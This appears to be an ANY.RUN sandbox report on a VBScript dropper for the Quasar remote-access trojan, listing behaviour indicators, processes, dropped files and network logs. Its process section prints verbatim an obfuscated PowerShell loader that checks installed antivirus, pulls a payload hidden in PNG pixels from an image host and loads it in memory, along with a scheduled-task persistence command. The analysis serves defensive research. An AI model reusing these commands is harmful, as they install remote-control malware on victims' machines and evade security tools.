File name:

update1-Copy.vbs

Full analysis: https://app.any.run/tasks/0a14a03f-9e03-4963-91d4-7ebddca33a2c
Verdict: Malicious activity
Threats:

Quasar is a very popular RAT in the world thanks to its code being available in open-source. This malware can be used to control the victim’s computer remotely.

Analysis date: January 31, 2026, 20:46:50
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
github
powershell
evasion
quasar
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (397), with CRLF line terminators
MD5:

6D9F9F5EC52D51CA47BD3D3E7FBBF3CD

SHA1:

5F864513F7A7581FE1BCFDA19884BED7A0CBBEFB

SHA256:

D258D99A8380E4874FC88549EE8F80BF9B5CC157A3C8459A01E792AC65FE43A3

SSDEEP:

24:LNzxHP9Wmo23T+13oH3QSCuhJzsEKXxmG6CcwuZEC:L7iIKCOcsE64wm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 7208)
    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 7208)
    • Gets TEMP folder path (SCRIPT)

      • wscript.exe (PID: 7208)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 7208)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 7208)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7256)
      • conhost.exe (PID: 7952)
      • g2vb08YW.exe (PID: 5012)
      • cmd.exe (PID: 7496)
      • conhost.exe (PID: 7728)
      • g2vb08YW.exe (PID: 2988)
      • cmd.exe (PID: 4460)
      • conhost.exe (PID: 8112)
      • cmd.exe (PID: 7716)
      • g2vb08YW.exe (PID: 3592)
      • conhost.exe (PID: 7828)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4584)
      • powershell.exe (PID: 4756)
      • powershell.exe (PID: 7940)
      • powershell.exe (PID: 8080)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4584)
      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 4776)
      • powershell.exe (PID: 4756)
      • powershell.exe (PID: 7692)
      • powershell.exe (PID: 7928)
      • powershell.exe (PID: 7940)
      • powershell.exe (PID: 8176)
      • powershell.exe (PID: 8080)
      • powershell.exe (PID: 7468)
      • powershell.exe (PID: 3720)
    • Execute application with conhost.exe as parent process

      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 7692)
      • powershell.exe (PID: 8176)
      • powershell.exe (PID: 3720)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 7692)
      • powershell.exe (PID: 8176)
      • powershell.exe (PID: 3720)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 7692)
      • powershell.exe (PID: 8176)
      • powershell.exe (PID: 3720)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 8084)
    • QUASAR has been detected (YARA)

      • powershell.exe (PID: 7996)
  • SUSPICIOUS

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 7208)
    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • wscript.exe (PID: 7208)
    • Changes charset (SCRIPT)

      • wscript.exe (PID: 7208)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 7208)
    • Saves data to a binary file (SCRIPT)

      • wscript.exe (PID: 7208)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 7208)
      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 4776)
      • powershell.exe (PID: 7928)
      • powershell.exe (PID: 7468)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 7208)
      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 4776)
      • powershell.exe (PID: 7928)
      • powershell.exe (PID: 7468)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7208)
    • Sets the value of the file’s Zone.Identifier ADS stream

      • cmd.exe (PID: 7256)
      • cmd.exe (PID: 7496)
      • cmd.exe (PID: 4460)
      • cmd.exe (PID: 7716)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7256)
      • conhost.exe (PID: 7952)
      • g2vb08YW.exe (PID: 5012)
      • cmd.exe (PID: 7496)
      • conhost.exe (PID: 7728)
      • g2vb08YW.exe (PID: 2988)
      • cmd.exe (PID: 4460)
      • conhost.exe (PID: 8112)
      • cmd.exe (PID: 7716)
      • g2vb08YW.exe (PID: 3592)
      • conhost.exe (PID: 7828)
    • Hides errors and continues executing the command without stopping

      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 7692)
      • powershell.exe (PID: 8176)
      • powershell.exe (PID: 3720)
    • Probably download files using WebClient

      • conhost.exe (PID: 7952)
      • conhost.exe (PID: 7728)
      • conhost.exe (PID: 8112)
      • conhost.exe (PID: 7828)
    • Obfuscation pattern (POWERSHELL)

      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 7692)
      • powershell.exe (PID: 8176)
      • powershell.exe (PID: 3720)
    • Possibly malicious use of IEX has been detected

      • conhost.exe (PID: 7952)
      • conhost.exe (PID: 7728)
      • conhost.exe (PID: 8112)
      • conhost.exe (PID: 7828)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7256)
      • cmd.exe (PID: 7496)
      • cmd.exe (PID: 4460)
      • cmd.exe (PID: 7716)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7996)
    • Lists all scheduled tasks

      • schtasks.exe (PID: 8172)
      • schtasks.exe (PID: 6052)
      • schtasks.exe (PID: 5160)
      • schtasks.exe (PID: 3992)
    • The process executes via Task Scheduler

      • g2vb08YW.exe (PID: 5012)
      • g2vb08YW.exe (PID: 2988)
      • g2vb08YW.exe (PID: 3592)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 7996)
    • Checks for external IP

      • svchost.exe (PID: 2324)
  • INFO

    • Manual execution by a user

      • wscript.exe (PID: 7208)
    • Drops script file

      • OpenWith.exe (PID: 7040)
      • wscript.exe (PID: 7208)
      • cmd.exe (PID: 7256)
      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 4584)
      • powershell.exe (PID: 4776)
      • cmd.exe (PID: 7496)
      • powershell.exe (PID: 4756)
      • powershell.exe (PID: 7692)
      • powershell.exe (PID: 7928)
      • cmd.exe (PID: 4460)
      • powershell.exe (PID: 7940)
      • powershell.exe (PID: 8176)
      • powershell.exe (PID: 8080)
      • cmd.exe (PID: 7716)
      • powershell.exe (PID: 7468)
      • powershell.exe (PID: 3720)
    • Launches file with unassociated extension

      • OpenWith.exe (PID: 7040)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 7040)
    • Disables trace logs

      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 7692)
      • powershell.exe (PID: 8176)
      • powershell.exe (PID: 3720)
    • Checks proxy server information

      • powershell.exe (PID: 7996)
      • slui.exe (PID: 676)
      • powershell.exe (PID: 7692)
      • powershell.exe (PID: 8176)
      • powershell.exe (PID: 3720)
    • Using PowerShell for GZIP File Operations

      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 7692)
      • powershell.exe (PID: 8176)
      • powershell.exe (PID: 3720)
    • There is functionality for taking screenshot (YARA)

      • powershell.exe (PID: 7996)
    • Checks supported languages

      • g2vb08YW.exe (PID: 5012)
      • g2vb08YW.exe (PID: 2988)
      • g2vb08YW.exe (PID: 3592)
    • The sample compiled with english language support

      • powershell.exe (PID: 7996)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
194
Monitored processes
39
Malicious processes
19
Suspicious processes
0

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
676C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1512schtasks /create /sc minute /mo 1 /tn "wfJH1EJXuk4lGx_1YAympq7" /tr "\"C:\Users\admin\AppData\Roaming\MnSSJ0CTaNEG\g2vb08YW.exe\" --headless powershell.exe -ep bypass -w h \"C:\Users\admin\AppData\Roaming\sparrow.bat\""C:\Windows\System32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2324C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2988"C:\Users\admin\AppData\Roaming\MnSSJ0CTaNEG\g2vb08YW.exe" --headless powershell.exe -ep bypass -w h "C:\Users\admin\AppData\Roaming\sparrow.bat"C:\Users\admin\AppData\Roaming\MnSSJ0CTaNEG\g2vb08YW.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\roaming\mnssj0ctaneg\g2vb08yw.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3592"C:\Users\admin\AppData\Roaming\MnSSJ0CTaNEG\g2vb08YW.exe" --headless powershell.exe -ep bypass -w h "C:\Users\admin\AppData\Roaming\sparrow.bat"C:\Users\admin\AppData\Roaming\MnSSJ0CTaNEG\g2vb08YW.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\roaming\mnssj0ctaneg\g2vb08yw.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3656\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeschtasks.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3720powershell.exe -ep bypass -w h -c "$p3QqB8fiQXL = Get-CimInstance -Namespace \"root\SecurityCenter2\" -ClassName AntiVirusProduct -ErrorAction SilentlyContinue; $b3AkR4e = $false; if ($p3QqB8fiQXL) { foreach ($mW2NXsa5m in $p3QqB8fiQXL) { $z6bvf = $mW2NXsa5m.displayName; if ($z6bvf -like \"*ESET Security*\") { }; if ($z6bvf -like \"*Malwarebytes*\" -or $z6bvf -like \"*F-Secure*\") { Add-Type -AssemblyName System.Drawing;; $euglq8XA2Qv = \"https://\";; $vGBIJt = \"i.ibb.co/hJs497Gd/oapi2i9gdak.png\";; $vbdCj8j5 = $euglq8XA2Qv + $vGBIJt;; $vPxRXE9x = New-Object System.Net.WebClient;; $wxF9CUh6Sf = $vPxRXE9x.DownloadData($vbdCj8j5);; $vPxRXE9x.Dispose();; $sAwR0r5h1 = New-Object IO.MemoryStream(,$wxF9CUh6Sf);; $wfMVYOQ = [System.Drawing.Bitmap]::FromStream($sAwR0r5h1);; $rU2xKqbBCY = $wfMVYOQ.GetPixel(0,0);; $s5HD1Gi = $wfMVYOQ.GetPixel(1,0);; $pRKL5VG = ([uint32]$rU2xKqbBCY.R -shl 24)-bor([uint32]$rU2xKqbBCY.G -shl 16)-bor([uint32]$rU2xKqbBCY.B -shl 8)-bor [uint32]$s5HD1Gi.R;; $bs5sqwbqVR = New-Object byte[] $pRKL5VG;; $xzmml6p = 0; $luLVoQ = 2; $cfgj6Ld = 0;; while ($xzmml6p -lt $pRKL5VG) { $ziGFiu4q = $wfMVYOQ.GetPixel($luLVoQ, $cfgj6Ld);; $bs5sqwbqVR[$xzmml6p++] = $ziGFiu4q.R;; if ($xzmml6p -lt $pRKL5VG) { $bs5sqwbqVR[$xzmml6p++] = $ziGFiu4q.G };; if ($xzmml6p -lt $pRKL5VG) { $bs5sqwbqVR[$xzmml6p++] = $ziGFiu4q.B };; $luLVoQ++;; if ($luLVoQ -ge $wfMVYOQ.Width) { $luLVoQ = 0; $cfgj6Ld++ }; }; $wfMVYOQ.Dispose();; $sAwR0r5h1.Dispose();; $dnn6zFzPP = [System.Text.Encoding]::UTF8.GetString($bs5sqwbqVR);; Invoke-Expression $dnn6zFzPP;; $b3AkR4e = $true;; break; }; }; }; Add-Type -AssemblyName System.Drawing;; $fhcpMmtNEvH = \"https://\";; $tQ5aZ = \"i.ibb.co/9fNFjQj/hu237scu.png\";; $hvmpdp0x= $fhcpMmtNEvH + $tQ5aZ;; $r1GJ1F0=New-Object System.Net.WebClient;; $hCTZIXtoT=$r1GJ1F0.DownloadData($hvmpdp0x);; $r1GJ1F0.Dispose();; $qPPWZC=New-Object IO.MemoryStream(,$hCTZIXtoT);; $vFV7dXz=[System.Drawing.Bitmap]::FromStream($qPPWZC);; $xNV8WP=$vFV7dXz.GetPixel(0,0);; $xbOIfTUI=$vFV7dXz.GetPixel(1,0);; $augnRM3cdmc=([uint32]$xNV8WP.R -shl 24)-bor([uint32]$xNV8WP.G -shl 16)-bor([uint32]$xNV8WP.B -shl 8)-bor [uint32]$xbOIfTUI.R; $cRnPuLNkHq6=New-Object System.Collections.Generic.List[byte]; for($bVOhrxNe=0;$bVOhrxNe -lt $vFV7dXz.Height;$bVOhrxNe++){ for($w7TQmHrTT4J=0;$w7TQmHrTT4J -lt $vFV7dXz.Width;$w7TQmHrTT4J++){ if(($w7TQmHrTT4J -eq 0 -and $bVOhrxNe -eq 0)-or($w7TQmHrTT4J -eq 1 -and $bVOhrxNe -eq 0)){ continue; };; $oYuB2Uhgx=$vFV7dXz.GetPixel($w7TQmHrTT4J,$bVOhrxNe);; $cRnPuLNkHq6.Add($oYuB2Uhgx.R);; $cRnPuLNkHq6.Add($oYuB2Uhgx.G);; $cRnPuLNkHq6.Add($oYuB2Uhgx.B); }; }; $vFV7dXz.Dispose();; $qPPWZC.Dispose();; $txNj68V=$cRnPuLNkHq6.ToArray()[0..($augnRM3cdmc-1)];; $sJ7bnUE9ie=New-Object IO.MemoryStream(,$txNj68V);; $lYwwZD6=New-Object IO.MemoryStream;; $ryMF8KH=New-Object IO.Compression.GZipStream($sJ7bnUE9ie, [IO.Compression.CompressionMode](0));; $ryMF8KH.CopyTo($lYwwZD6);; $ryMF8KH.Dispose();; $sJ7bnUE9ie.Dispose();; $jccKt7=$lYwwZD6.ToArray();; $lYwwZD6.Dispose();; foreach($faQILJ63MdU in [AppDomain]::CurrentDomain.GetAssemblies()){ if($faQILJ63MdU.GlobalAssemblyCache -and $faQILJ63MdU.Location.Contains('mscor'+'lib.dll')){ foreach($nxaXQ9Nfwee in $faQILJ63MdU.GetType(('System.Reflection.Assembly')).GetMethods('Public,Static')){ if($nxaXQ9Nfwee.ToString()[37] -eq ']'){ $lPGi6gDcC1j=$nxaXQ9Nfwee.Invoke($null,(,$jccKt7));; $e5uUTE9=$lPGi6gDcC1j.EntryPoint;; $fMbZvpvK=$e5uUTE9.GetParameters().Count;; if($fMbZvpvK -eq 0){ $wKi5Qh5dY = \"e5uUTE9\"; $nKREPnNOUO3 = \"Invoke\"; (Get-Variable $wKi5Qh5dY).Value.$nKREPnNOUO3($null, $null); }else{ $e5uUTE9.Invoke($null,(,@())); };; break; }; };; break; }; }"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
conhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3992"schtasks" /query /tn "wfJH1EJXuk4lGx_1YAympq7"C:\Windows\System32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4460C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\sparrow.bat""C:\Windows\System32\cmd.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
4584powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Set-Content 'C:\Users\admin\AppData\Local\Temp\payload.bat' -Stream Zone.Identifier -Value ''" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
74 761
Read events
74 757
Write events
4
Delete events
0

Modification events

(PID) Process:(7040) OpenWith.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\VSLauncher.exe.FriendlyAppName
Value:
Microsoft Visual Studio Version Selector
(PID) Process:(7040) OpenWith.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\VSLauncher.exe.ApplicationCompany
Value:
Microsoft Corporation
(PID) Process:(7040) OpenWith.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\97\52C64B7E
Operation:writeName:@C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\oregres.dll,-205
Value:
Word
(PID) Process:(7040) OpenWith.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\97\52C64B7E
Operation:writeName:@wmploc.dll,-102
Value:
Windows Media Player
Executable files
1
Suspicious files
2
Text files
28
Unknown types
0

Dropped files

PID
Process
Filename
Type
4584powershell.exeC:\Users\admin\AppData\Local\Temp\payload.bat:Zone.Identifier
MD5:
SHA256:
4584powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mrcx31un.lob.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4776powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_alsobmhe.umg.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7928powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_d104udpr.px5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4584powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:0A0A2C524C71D538B485595FE9BDDEA9
SHA256:DC1F56D4DE1C3E1B672018AAB104CFE04D5B8D08EFD7E3E4254FB6209D1BC2B3
7208wscript.exeC:\Users\admin\AppData\Local\Temp\payload.battext
MD5:216156463C143825912EFE892ACD2963
SHA256:0FF3D47791CD43139E3AA930CEA7DD3D6934ADD6BA585146E4794592DDEB0F27
4584powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1twpqlca.k1j.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7256cmd.exeC:\Users\admin\AppData\Roaming\sparrow.bat:Zone.Identifiertext
MD5:81051BCC2CF1BEDF378224B0A93E2877
SHA256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
7256cmd.exeC:\Users\admin\AppData\Roaming\sparrow.battext
MD5:216156463C143825912EFE892ACD2963
SHA256:0FF3D47791CD43139E3AA930CEA7DD3D6934ADD6BA585146E4794592DDEB0F27
7996powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_olt0kkcp.e2z.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
38
TCP/UDP connections
44
DNS requests
26
Threats
17

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6596
MoUsoCoreWorker.exe
GET
304
51.124.78.146:443
https://settings-win.data.microsoft.com/settings/v3.0/OneSettings/Client?OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&LocalDeviceID=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&AttrDataVer=186&OSUILocale=en-US&OSSkuId=48&App=WOSC&AppVer=&IsFlightingEnabled=0&TelemetryLevel=1&DeviceFamily=Windows.Desktop
US
whitelisted
6988
svchost.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
3952
SIHClient.exe
GET
200
135.233.95.135:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
US
whitelisted
3952
SIHClient.exe
GET
200
20.165.94.63:443
https://slscr.update.microsoft.com/sls/ping
US
whitelisted
3952
SIHClient.exe
GET
304
20.165.94.63:443
https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
6988
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
3964
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
3964
svchost.exe
POST
200
40.126.31.130:443
https://login.live.com/RST2.srf
US
xml
10.3 Kb
whitelisted
6988
svchost.exe
GET
200
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/WaaSAssessment?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&ring=Retail&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=10.0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=586&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=WaaSAssessment&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&ServicingBranch=CB&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&HonorWUfBDeferrals=1&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2
US
text
5.66 Kb
whitelisted
3964
svchost.exe
POST
200
40.126.31.130:443
https://login.live.com/RST2.srf
US
xml
10.3 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6596
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
2492
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5560
SearchApp.exe
92.123.104.52:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
3964
svchost.exe
40.126.31.130:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
3964
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
6988
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6988
svchost.exe
23.216.77.28:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
www.bing.com
  • 92.123.104.52
  • 92.123.104.65
  • 92.123.104.17
  • 92.123.104.67
  • 92.123.104.60
  • 92.123.104.61
  • 92.123.104.53
  • 92.123.104.50
  • 92.123.104.62
whitelisted
google.com
  • 216.58.206.46
whitelisted
login.live.com
  • 40.126.31.130
  • 40.126.31.73
  • 40.126.31.1
  • 40.126.31.131
  • 40.126.31.128
